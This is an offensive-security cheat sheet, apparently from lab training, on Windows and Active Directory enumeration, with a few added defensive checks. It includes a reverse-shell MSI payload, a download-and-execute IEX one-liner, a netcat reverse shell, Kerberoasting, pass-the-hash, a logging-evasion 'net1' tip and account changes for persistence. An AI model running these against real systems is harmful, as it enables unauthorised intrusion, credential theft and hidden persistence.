# Enumeration

## Passive Network Enumeration

```bash
#Use Wireshark to capture either ARP or mDNS traffic (GUI)
Intrusionz3r0X@htb[/htb]$ sudo -E wireshark

#Use tcpdump to capture traffic
Intrusionz3r0X@htb[/htb]$ sudo tcpdump -i ens224 -w capture.pcap

#Read capture.pcap, keep only ARP frames and extract the unique IP addresses
Intrusionz3r0X@htb[/htb]$ tshark -r capture.pcap -Y "arp" | grep -oP "\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}" | sort -u

#Analyze traffic with responder in analyze mode (no poisoning)
Intrusionz3r0X@htb[/htb]$ sudo responder -I ens224 -A
```

## Active Network Enumeration

```bash
#Host Discovery
Intrusionz3r0X@htb[/htb]$ fping -asgq <range>
Intrusionz3r0X@htb[/htb]$ nmap -sn -n <range>

#Host Discovery (Windows)
C:\> for /L %i in (1 1 254) do ping 172.16.5.%i -n 1 -w 100 | find "Reply"
PS C:\> 1..254 | % {"172.16.5.$($_): $(Test-Connection -count 1 -comp 172.16.5.$($_) -quiet)"}

#DNS enumeration
Intrusionz3r0X@htb[/crto]$ dig cyberbotic.io
Intrusionz3r0X@htb[/crto]$ whois 172.67.205.143
Intrusionz3r0X@htb[/crto]$ ./dnscan.py -d cyberbotic.io -w subdomains-100.txt
```

## Default Writeable Folders <a href="#default-writeable-folders" id="default-writeable-folders"></a>

```powershell
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
C:\Windows\System32\spool\drivers\color
C:\Windows\System32\spool\printers
C:\Windows\System32\spool\servers
C:\Windows\tracing
C:\Windows\Temp
C:\Users\Public
C:\Windows\Tasks
C:\Windows\System32\tasks
C:\Windows\SysWOW64\tasks
C:\Windows\System32\tasks_migrated\microsoft\windows\pls\system
C:\Windows\SysWOW64\tasks\microsoft\windows\pls\system
C:\Windows\debug\wia
C:\Windows\registration\crmlog
C:\Windows\System32\com\dmp
C:\Windows\SysWOW64\com\dmp
C:\Windows\System32\fxstmp
C:\Windows\SysWOW64\fxstmp
```
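A defender-side check for the list above, added here as an example (it is not part of the original page): it reads each folder's ACL and reports allow entries that grant write rights to broad principals. The principal list and the folder subset in the usage call are assumptions; adjust them to the host.

```powershell
# Added example: report write access granted to broad principals on the folders listed above.
# Assumes the caller can read each folder's ACL; paths that do not exist are skipped.
function Get-BroadWriteAccess {
    param(
        [Parameter(Mandatory)][string[]]$Path,
        # Assumed set of "everyone-like" principals; extend it for your environment.
        [string[]]$Principal = @('Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users')
    )
    # WriteData (0x2) and AppendData (0x4) are contained in Write, Modify and FullControl,
    # so testing those bits catches every right that lets a user create or change files.
    # GENERIC_WRITE (0x40000000) and GENERIC_ALL (0x10000000) cover ACEs that still carry
    # generic rights instead of mapped file-system rights.
    $writeMask = 0x2 -bor 0x4 -bor 0x40000000 -bor 0x10000000
    foreach ($p in $Path) {
        if (-not (Test-Path -LiteralPath $p)) { continue }
        try { $acl = Get-Acl -LiteralPath $p }
        catch { Write-Warning "Cannot read ACL of $p : $_"; continue }
        foreach ($ace in $acl.Access) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            if ($Principal -notcontains $ace.IdentityReference.Value) { continue }
            if (([int]$ace.FileSystemRights -band $writeMask) -eq 0) { continue }
            [pscustomobject]@{
                Path      = $p
                Principal = $ace.IdentityReference.Value
                Rights    = $ace.FileSystemRights
                Inherited = $ace.IsInherited
            }
        }
    }
}

# A subset of the folders above. Deny entries are ignored, so treat hits as candidates to verify.
$folders = 'C:\Windows\Tasks', 'C:\Windows\Temp', 'C:\Windows\tracing', 'C:\Users\Public'
Get-BroadWriteAccess -Path $folders | Format-Table -AutoSize
```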

## SMB

```bash
#Enumeration using enum4linux-ng
Intrusionz3r0X@htb[/htb]$ enum4linux-ng 10.10.11.45 -A -C

#SMBMAP
Intrusionz3r0X@htb[/htb]$ smbmap -H 10.129.14.128
Intrusionz3r0X@htb[/htb]$ smbmap -r -H x.x.x.x -u "null"
Intrusionz3r0X@htb[/htb]$ smbmap -H 10.129.14.128 -r <resource>
Intrusionz3r0X@htb[/htb]$ smbmap -H 10.129.14.128 --download "notes\note.txt"
Intrusionz3r0X@htb[/htb]$ smbmap -H 10.129.14.128 --upload test.txt "notes\test.txt"
Intrusionz3r0X@htb[/htb]$ smbmap -u "username" -p "<LM>:<NT>" -H <IP> [-P <PORT>] #Pass-the-Hash (hash is given as LM:NT)

#SMBClient
Intrusionz3r0X@htb[/htb]$ smbclient -N -L //10.129.14.128
Intrusionz3r0X@htb[/htb]$ smbclient -L x.x.x.x -U "null" -N
Intrusionz3r0X@htb[/htb]$ smbclient //10.129.14.128/notes

#Auth by Kerberos
Intrusionz3r0X@htb[/htb]$ export KRB5CCNAME=<user>.ccache
Intrusionz3r0X@htb[/htb]$ impacket-smbclient <domain>/<username>:<password> -k

#Download in recursive mode
smb: \Path\to\folder\> prompt off
smb: \Path\to\folder\> recurse true
smb: \Path\to\folder\> mget <folder>
```

### **Mount shared folder on Windows**

```powershell
#Mount shared folder (current credentials, or explicit user and password)
C:\htb> net use n: \\192.168.220.129\Finance
C:\htb> net use n: \\192.168.220.129\Finance /user:plaintext Password123
PS C:\htb> New-PSDrive -Name "N" -Root "\\192.168.220.129\Finance" -PSProvider "FileSystem"

#Mount SMB with creds
PS C:\htb> $username = 'intrusionz3r0'
PS C:\htb> $password = 'Password123'
PS C:\htb> $secpassword = ConvertTo-SecureString $password -AsPlainText -Force
PS C:\htb> $cred = New-Object System.Management.Automation.PSCredential $username, $secpassword
PS C:\htb> New-PSDrive -Name "N" -Root "\\192.168.220.129\Finance" -PSProvider "FileSystem" -Credential $cred
```

### **Mount shared folder on Linux**

```bash
#sudo apt install cifs-utils
Intrusionz3r0X@htb[/htb]$ sudo mkdir /mnt/Finance
Intrusionz3r0X@htb[/htb]$ sudo mount -t cifs -o username=plaintext,password=Password123,domain=. //192.168.220.129/Finance /mnt/Finance
#Intrusionz3r0X@htb[/htb]$ sudo mount -t cifs //x.x.x.x/SHARE /mnt/HTB/FOLDER -o username=USER,password=PASS,rw
Intrusionz3r0X@htb[/htb]$ sudo mount -t cifs //192.168.220.129/Finance /mnt/Finance -o credentials=/path/credentialfile
```

**CredentialFile:**

```
username=plaintext
password=Password123
domain=.
```

### **Manual SMB Enumeration**

```bash
#List shared folder
C:\htb> dir \\192.168.220.129\Finance\
PS C:\htb> Get-ChildItem \\192.168.220.129\Finance\

#Search for a specific word in the filename.
C:\htb> dir n:\*cred* /s /b
C:\htb> dir n:\*secret* /s /b
PS C:\htb> Get-ChildItem -Recurse -Path N:\ -Include *cred* -File
Intrusionz3r0X@htb[/htb]$ find /mnt/Finance/ -name "*cred*"

#Search for a specific word within the content of the files.
C:\htb> findstr /s /i cred n:\*.*
PS C:\htb> Get-ChildItem -Recurse -Path N:\ | Select-String "cred" -List
Intrusionz3r0X@htb[/htb]$ grep -rn /mnt/Finance/ -ie cred
```

### Create SMB Share on Windows from Commandline <a href="#create-smb-share-on-windows-from-commandline" id="create-smb-share-on-windows-from-commandline"></a>

```powershell
mkdir C:\temp
net share temp=C:\temp /grant:everyone,full
```

## RPCClient

```bash
#Brute-force RIDs 500-1100 with a null session and print the name and RIDs of every user found
Intrusionz3r0X@htb[/htb]$ for i in $(seq 500 1100);do rpcclient -N -U "" 10.129.14.128 -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo "";done
Intrusionz3r0X@htb[/htb]$ samrdump.py 10.129.14.128
```

| **Query**                 | **Description**                                                    |
| ------------------------- | ------------------------------------------------------------------ |
| `srvinfo`                 | Server information.                                                |
| `enumdomains`             | Enumerate all domains that are deployed in the network.            |
| `querydominfo`            | Provides domain, server, and user information of deployed domains. |
| `netshareenumall`         | Enumerates all available shares.                                   |
| `netsharegetinfo <share>` | Provides information about a specific share.                       |
| `enumdomusers`            | Enumerates all domain users.                                       |
| `queryuser <RID>`         | Provides information about a specific user.                        |
| `querygroup <RID>`        | Provides information about a specific group.                       |

## **Monitoring for Processes on Windows**

```powershell
PS C:\htb> IEX (iwr 'http://10.10.10.205/procmon.ps1')

#Poll the process list every second and print command lines that appeared or disappeared
while($true)
{
  $process = Get-WmiObject Win32_Process | Select-Object CommandLine
  Start-Sleep 1
  $process2 = Get-WmiObject Win32_Process | Select-Object CommandLine
  Compare-Object -ReferenceObject $process -DifferenceObject $process2
}
```

## List installed programs

```powershell
PS C:\htb> $INSTALLED = Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, InstallLocation
PS C:\htb> $INSTALLED += Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, InstallLocation
PS C:\htb> $INSTALLED | ?{ $_.DisplayName -ne $null } | sort-object -Property DisplayName -Unique | Format-Table -AutoSize
```

## Am I Alone?

```powershell
#List active sessions on the host
PS C:\htb> qwinsta
```

## **Always Install Elevated**

```powershell
#Enumerating Always Install Elevated settings
PS C:\htb> reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
PS C:\htb> reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer
#Generating MSI package
Intrusionz3r0@htb[/htb]$ msfvenom -p windows/shell_reverse_tcp lhost=10.10.14.3 lport=9443 -f msi > aie.msi
#Executing MSI
C:\htb> msiexec /i c:\users\htb-student\desktop\aie.msi /quiet /qn /norestart
```
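The two `reg query` lines above need to be read together: the setting only matters when `AlwaysInstallElevated` is 1 in both hives. The following check is an added example (not from the original page) that encodes that rule and treats a missing value as 0.

```powershell
# Added example: AlwaysInstallElevated only gives SYSTEM-level MSI installs when the value is 1
# in BOTH HKCU and HKLM; one hive alone is not enough. Missing keys or values count as 0.
function Test-AlwaysInstallElevated {
    $subKey = 'Software\Policies\Microsoft\Windows\Installer'
    $state = [ordered]@{}
    foreach ($hive in 'HKCU', 'HKLM') {
        $item = Get-ItemProperty -Path ($hive + ':\' + $subKey) -Name AlwaysInstallElevated -ErrorAction SilentlyContinue
        $state[$hive] = if ($null -ne $item) { [int]$item.AlwaysInstallElevated } else { 0 }
    }
    [pscustomobject]@{
        HKCU       = $state['HKCU']
        HKLM       = $state['HKLM']
        Vulnerable = ($state['HKCU'] -eq 1 -and $state['HKLM'] -eq 1)
    }
}

Test-AlwaysInstallElevated
```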

## Enumerate Remote Privilege Access

```powershell
#Check Remote Desktop access
PS C:\htb> Get-NetLocalGroupMember -ComputerName ACADEMY-EA-MS01 -GroupName "Remote Desktop Users"

#Check PSRemote access (WinRM)
PS C:\htb> Get-NetLocalGroupMember -ComputerName ACADEMY-EA-MS01 -GroupName "Remote Management Users"
#BloodHound query:
MATCH p1=shortestPath((u1:User)-[r1:MemberOf*1..]->(g1:Group)) MATCH p2=(u1)-[:CanPSRemote*1..]->(c:Computer) RETURN p2

#SQL Server admin remote access
#BloodHound query:
MATCH p1=shortestPath((u1:User)-[r1:MemberOf*1..]->(g1:Group)) MATCH p2=(u1)-[:SQLAdmin*1..]->(c:Computer) RETURN p2
```

## Authentication

```powershell
#PSExec
impacket-psexec inlanefreight.local/wley:'transporter@4'@172.16.5.125
#Windows Management Instrumentation (more stealthy approach)
impacket-wmiexec inlanefreight.local/wley:'transporter@4'@172.16.5.5

#Impersonate user
$user = '<domain>\<user>'
$password = ConvertTo-SecureString '<password>' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential($user,$password)
Invoke-Command -ComputerName '<computer-name>' -Credential $cred -ScriptBlock { C:\Temp\netcat.exe -e cmd <ip> <port> }
```

## Network Information

```powershell
#Lists all known hosts stored in the ARP table.
PS C:\> arp -a

#Prints out adapter settings for the host.
PS C:\> ipconfig /all

#Displays the routing table (IPv4 & IPv6) identifying known networks and layer three routes shared with the host.
PS C:\> route print

#Displays the status of the host's firewall. We can determine if it is active and filtering traffic.
PS C:\> netsh advfirewall show state
```

## Windows Management Instrumentation (WMI)

```powershell
#Prints the patch level and description of the hotfixes applied
PS C:\> wmic qfe get Caption,Description,HotFixID,InstalledOn

#Displays basic host information
PS C:\> wmic computersystem get Name,Domain,Manufacturer,Model,Username,Roles /format:List

#A listing of all processes on the host
PS C:\> wmic process list /format:list

#Displays information about the domain and domain controllers
PS C:\> wmic ntdomain list /format:list

#Displays information about all local accounts
PS C:\> wmic useraccount list /format:list

#Information about all local groups
PS C:\> wmic group list /format:list

#Dumps information about any system accounts that are being used as service accounts.
PS C:\> wmic sysaccount list /format:list
```

**Additional useful commands:** [**xorrior**](https://gist.github.com/xorrior/67ee741af08cb1fc86511047550cdaf4)

## **Net Commands**

{% hint style="info" %}

#### **Net Commands Trick**

If you believe the network defenders are actively logging or looking for any commands out of the ordinary, you can try this workaround for net commands: typing `net1` instead of `net` executes the same functions without the potential trigger on the `net` string.
{% endhint %}

```powershell
#Information about password requirements
PS C:\> net accounts

#Password and lockout policy
PS C:\> net accounts /domain

#Information about domain groups
PS C:\> net group /domain

#List users with domain admin privileges
PS C:\> net group "Domain Admins" /domain

#List of PCs connected to the domain
PS C:\> net group "domain computers" /domain

#List PC accounts of domain controllers
PS C:\> net group "Domain Controllers" /domain

#User that belongs to the group
PS C:\> net group <domain_group_name> /domain

#List of domain groups
PS C:\> net groups /domain

#All available groups
PS C:\> net localgroup

#List users that belong to the administrators group inside the domain (the group Domain Admins is included here by default)
PS C:\> net localgroup administrators /domain

#Information about a group (admins)
PS C:\> net localgroup administrators

#Add user to administrators
PS C:\> net localgroup administrators [username] /add

#Check current shares
PS C:\> net share

#Get information about a user within the domain
PS C:\> net user <ACCOUNT_NAME> /domain

#List all users of the domain
PS C:\> net user /domain

#Information about the current user
PS C:\> net user %username%

#Mount the share locally
PS C:\> net use X: \\computer\share

#Get a list of computers
PS C:\> net view

#Shares on the domains
PS C:\> net view /all /domain[:domainname]

#List shares of a computer
PS C:\> net view \\computer /ALL

#List of PCs of the domain
PS C:\> net view /domain
```
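The detection-side counterpart of the `net1` trick above, added here as an example (not part of the original page): a rule over process-creation records that keys on both `net.exe` and `net1.exe`, since `net.exe` hands most subcommands to `net1.exe` anyway. The sample records are constructed, shaped like Sysmon Event ID 1 fields; mapping live `Get-WinEvent` output to those field names is left as an assumption.

```powershell
# Added example (not from the original page): flag process-creation records where net.exe or
# net1.exe is used for domain or group enumeration. Keying on net1.exe as well as net.exe sees
# both the normal path (net.exe spawns net1.exe) and a direct net1 substitution.
function Find-NetEnumeration {
    param([Parameter(Mandatory, ValueFromPipeline)][psobject]$Record)
    process {
        $image = [IO.Path]::GetFileName([string]$Record.Image).ToLowerInvariant()
        if ($image -notin 'net.exe', 'net1.exe') { return }
        $cmd = [string]$Record.CommandLine
        # Patterns taken from the command list above; "net use" is deliberately not flagged.
        $hit = ($cmd -match '\b(group|user|accounts|view)\b.*/domain') -or
               ($cmd -match '\blocalgroup\s+administrators\b')
        if ($hit) {
            [pscustomobject]@{
                Time        = $Record.TimeCreated
                User        = $Record.User
                Image       = $image
                Parent      = [IO.Path]::GetFileName([string]$Record.ParentImage)
                CommandLine = $cmd
            }
        }
    }
}

# Constructed sample records in the shape of Sysmon Event ID 1 fields (not real telemetry).
$sample = @(
    [pscustomobject]@{ TimeCreated = '2024-05-01 09:12:03'; User = 'CORP\alice'
        Image = 'C:\Windows\System32\net.exe';  ParentImage = 'C:\Windows\System32\cmd.exe'
        CommandLine = 'net  group "Domain Admins" /domain' }
    [pscustomobject]@{ TimeCreated = '2024-05-01 09:12:03'; User = 'CORP\alice'
        Image = 'C:\Windows\System32\net1.exe'; ParentImage = 'C:\Windows\System32\net.exe'
        CommandLine = 'C:\Windows\system32\net1  group "Domain Admins" /domain' }
    [pscustomobject]@{ TimeCreated = '2024-05-01 09:13:41'; User = 'CORP\alice'
        Image = 'C:\Windows\System32\net1.exe'; ParentImage = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
        CommandLine = 'net1 user /domain' }
    [pscustomobject]@{ TimeCreated = '2024-05-01 09:15:00'; User = 'CORP\bob'
        Image = 'C:\Windows\System32\net.exe';  ParentImage = 'C:\Windows\System32\cmd.exe'
        CommandLine = 'net use X: \\fileserver\share' }
)

# Three hits are expected (the net.exe call, its net1.exe child and the direct net1 call); "net use" is ignored.
$sample | Find-NetEnumeration | Format-Table -AutoSize
```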

## PowerShell Cmdlets

```powershell
#Discover modules
PS C:\htb> Get-Module

#Load AD module
PS C:\htb> Import-Module ActiveDirectory

#Get domain info
PS C:\htb> Get-ADDomain

#Checking for trust relationships
PS C:\htb> Get-ADTrust -Filter *

#Get-ADUser listing of accounts that may be susceptible to a Kerberoasting attack
PS C:\htb> Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName

#Group enumeration, detailed information
PS C:\htb> Get-ADGroup -Filter * | select name
PS C:\htb> Get-ADGroup -Identity "Backup Operators"
#List the group members
PS C:\htb> Get-ADGroupMember -Identity "Backup Operators"

#Testing for local admin access with the current user (PowerView)
PS C:\htb> Test-AdminAccess -ComputerName ACADEMY-EA-MS01
```

## Tools

### Bloodhound

{% hint style="info" %}
Check these out:

1. **First degree object control**
2. **Group delegated object control** items.
{% endhint %}

```bash
#Executing BloodHound on Linux
Intrusionz3r0X@htb[/htb]$ sudo bloodhound-python -u 'forend' -p 'Klmcargo2' -ns 172.16.5.5 -d inlanefreight.local -c all
Intrusionz3r0X@htb[/htb]$ zip -r ilfreight_bh.zip *.json
Intrusionz3r0X@htb[/htb]$ sudo neo4j start
Intrusionz3r0X@htb[/htb]$ bloodhound

#Execute bloodhound-python against a specific domain controller
Intrusionz3r0X@htb[/htb]$ bloodhound-python -d INLANEFREIGHT.LOCAL -dc ACADEMY-EA-DC01 -c All -u forend -p Klmcargo2

#Run neo4j in the foreground instead of as a service
Intrusionz3r0X@htb[/htb]$ sudo neo4j console

#Executing SharpHound on Windows
PS C:\htb> .\SharpHound.exe -c All --zipfilename ILFREIGHT
#Then type bloodhound into a CMD or PowerShell console to open the GUI
```

#### **Bloodhound Community Edition**

```sh
sudo apt-get install docker-compose -y
sudo mkdir /opt/bloodhound
cd /opt/bloodhound 
sudo wget https://github.com/SpecterOps/bloodhound-cli/releases/latest/download/bloodhound-cli-linux-amd64.tar.gz 
sudo tar -xzf ./bloodhound-cli-linux-amd64.tar.gz 
sudo rm bloodhound-cli-linux-amd64.tar.gz
sudo ./bloodhound-cli install

sudo ./bloodhound-cli containers stop #This will stop our containers
sudo ./bloodhound-cli containers start #This will start our containers
```

**Adding INLANEFREIGHT.LOCAL Information to /etc/resolv.conf**

```bash
Intrusionz3r0X@htb[/htb]$ cat /etc/resolv.conf 

# Dynamic resolv.conf(5) file for glibc resolver(3) generated by resolvconf(8)
#     DO NOT EDIT THIS FILE BY HAND -- YOUR CHANGES WILL BE OVERWRITTEN
# 127.0.0.53 is the systemd-resolved stub resolver.
# run "resolvectl status" to see details about the actual nameservers.

#nameserver 1.1.1.1
#nameserver 8.8.8.8
domain INLANEFREIGHT.LOCAL
nameserver 172.16.5.5
```

{% embed url="https://hausec.com/2019/09/09/bloodhound-cypher-cheatsheet/" %}

### Powerview

#### **Users**

```powershell
#Get info about a user
PS C:\htb> Get-NetUser -UserName student107
#List all users
PS C:\htb> Get-NetUser | select samaccountname, description, pwdlastset, logoncount, badpwdcount
#All disabled users
PS C:\htb> Get-NetUser -UACFilter ACCOUNTDISABLE
#Kerberoastable Domain Admins
PS C:\htb> Get-NetUser -SPN | ?{$_.memberof -match 'Domain Admins'}
```

#### Groups

```powershell
PS C:\htb> Get-NetGroup #Get groups
PS C:\htb> Get-NetGroup -Domain mydomain.local #Get groups of a specific domain
PS C:\htb> Get-NetGroup 'Domain Admins' #Get all data of a group
PS C:\htb> Get-NetGroup -UserName "myusername" #Get groups of a user

Get-NetGroupMember -Identity "Administrators" -Recurse #Get users inside the "Administrators" group. If there are groups inside this group, the -Recurse option also prints the users inside those groups
Get-NetGroupMember -Identity "Enterprise Admins" -Domain mydomain.local #Remember that the "Enterprise Admins" group only exists in the root domain of the forest
Get-NetLocalGroup -ComputerName dc.mydomain.local -ListGroups #Get local groups of a machine (you need admin rights on non-DC hosts)

# Recursive group membership to know who to target for potential elevation of privileges.
PS C:\htb> Get-DomainGroupMember -Identity "Domain Admins" -Recurse
```

**Computers**

```powershell
Get-DomainComputer -Properties DnsHostName #Get all domain names of computers
Get-NetComputer #Get all computer objects
Get-NetComputer -TrustedToAuth #Find computers with constrained delegation
```

#### Logon and Session

```powershell
Get-NetSession -ComputerName <servername> #Get active sessions on the host
Get-NetRDPSession -ComputerName <servername> #List RDP sessions inside a host (needs admin rights in host)
```

#### Retrieve Domain SID

```powershell
(Get-ADDomain).DomainSID
```

#### Powerful PowerView Commands

```powershell
# Recursive group membership to know who to target for potential elevation of privileges.
PS C:\htb> Get-DomainGroupMember -Identity "Domain Admins" -Recurse

#ASREPRoastable users
PS C:\htb> Get-DomainUser -PreauthNotRequired | select samaccountname,userprincipalname,useraccountcontrol | fl

#Kerberoastable users
PS C:\htb> Get-NetUser -SPN | select samaccountname,userprincipalname,useraccountcontrol | fl
PS C:\DotNetNuke\Portals\0> Get-DomainUser * -SPN -verbose | Get-DomainSPNTicket -Format Hashcat | Export-Csv .\ilfreight_spns.csv -NoTypeInformation

# Users with PASSWD_NOTREQD set in userAccountControl are not subject to the current password policy
# Users with this flag might have empty passwords (if allowed) or shorter passwords
Get-DomainUser -UACFilter PASSWD_NOTREQD | Select-Object samaccountname,useraccountcontrol

#Persistence
#ASREPRoast: set DONT_REQ_PREAUTH (0x400000 = 4194304) on the account
Set-DomainObject -Identity <username> -XOR @{useraccountcontrol=4194304} -Verbose
Get-ADUser Jorden | Set-ADAccountControl -doesnotrequirepreauth $true
#Kerberoasting: add an SPN to the account
Set-DomainObject -Identity <username> -Set @{serviceprincipalname='just/whateverUn1Que'} -verbose
#Revert DONT_REQ_PREAUTH
Get-ADUser -Filter 'Name -like "Jorden"' | Set-ADAccountControl -doesnotrequirepreauth $false

#Finding passwords in the description field using Get-DomainUser
Get-DomainUser * | Select-Object samaccountname, userprincipalname, useraccountcontrol, description | Where-Object {$_.Description -ne $null} | fl

#All disabled users
Get-NetUser -UACFilter ACCOUNTDISABLE

#Retrieve *most* users who can perform DC replication for inlanefreight.local (i.e. DCSync)
Get-ObjectAcl "dc=inlanefreight,dc=local" -ResolveGUIDs | ? {
    ($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll')
}
```
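Several commands above filter on `userAccountControl` (`-UACFilter ACCOUNTDISABLE`, `PASSWD_NOTREQD`, `-PreauthNotRequired`, `-TrustedToAuth`) or toggle a bit in it (`-XOR @{useraccountcontrol=4194304}`). The following added example (not from the original page) decodes the bitmask so such accounts can be audited; the flag values are the standard ADS_USER_FLAG constants and the sample accounts are constructed.

```powershell
# Added example (not from the original page): decode userAccountControl flags and report accounts
# carrying the bits the checks above look for. Flag values are the ADS_USER_FLAG constants.
$UacFlags = [ordered]@{
    SCRIPT                         = 0x0001
    ACCOUNTDISABLE                 = 0x0002
    PASSWD_NOTREQD                 = 0x0020
    NORMAL_ACCOUNT                 = 0x0200
    DONT_EXPIRE_PASSWORD           = 0x10000
    TRUSTED_FOR_DELEGATION         = 0x80000      # unconstrained delegation
    NOT_DELEGATED                  = 0x100000
    DONT_REQ_PREAUTH               = 0x400000     # 4194304: the bit toggled with -XOR above (ASREPRoast)
    TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000    # what Get-NetComputer -TrustedToAuth filters on
}
# Bits an auditor wants reviewed, mirroring the PreauthNotRequired / PASSWD_NOTREQD checks above.
$RiskyFlags = 'DONT_REQ_PREAUTH', 'PASSWD_NOTREQD', 'TRUSTED_TO_AUTH_FOR_DELEGATION', 'TRUSTED_FOR_DELEGATION'

function ConvertFrom-UserAccountControl {
    param([Parameter(Mandatory)][int]$Value)
    $UacFlags.GetEnumerator() | Where-Object { ($Value -band $_.Value) -ne 0 } | ForEach-Object { $_.Key }
}

function Find-RiskyUacAccounts {
    # Accepts any objects with samaccountname and userAccountControl properties,
    # e.g. the output of: Get-ADUser -Filter * -Properties userAccountControl
    param([Parameter(Mandatory)][psobject[]]$Account)
    foreach ($a in $Account) {
        $flags = @(ConvertFrom-UserAccountControl -Value ([int]$a.userAccountControl))
        $risky = @($flags | Where-Object { $_ -in $RiskyFlags })
        if ($risky.Count -gt 0) {
            [pscustomobject]@{
                SamAccountName = $a.samaccountname
                UAC            = [int]$a.userAccountControl
                Flags          = $flags -join ','
                Risk           = $risky -join ','
            }
        }
    }
}

# Constructed sample: 4194816 = 0x400200 = NORMAL_ACCOUNT + DONT_REQ_PREAUTH,
# 66080 = 0x10220 = NORMAL_ACCOUNT + DONT_EXPIRE_PASSWORD + PASSWD_NOTREQD, 514 = disabled normal account.
$sample = @(
    [pscustomobject]@{ samaccountname = 'jorden';     userAccountControl = 4194816 }
    [pscustomobject]@{ samaccountname = 'svc_backup'; userAccountControl = 66080 }
    [pscustomobject]@{ samaccountname = 'alice';      userAccountControl = 512 }
    [pscustomobject]@{ samaccountname = 'old_user';   userAccountControl = 514 }
)
# jorden (DONT_REQ_PREAUTH) and svc_backup (PASSWD_NOTREQD) are reported; alice and old_user are not.
Find-RiskyUacAccounts -Account $sample | Format-Table -AutoSize
```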

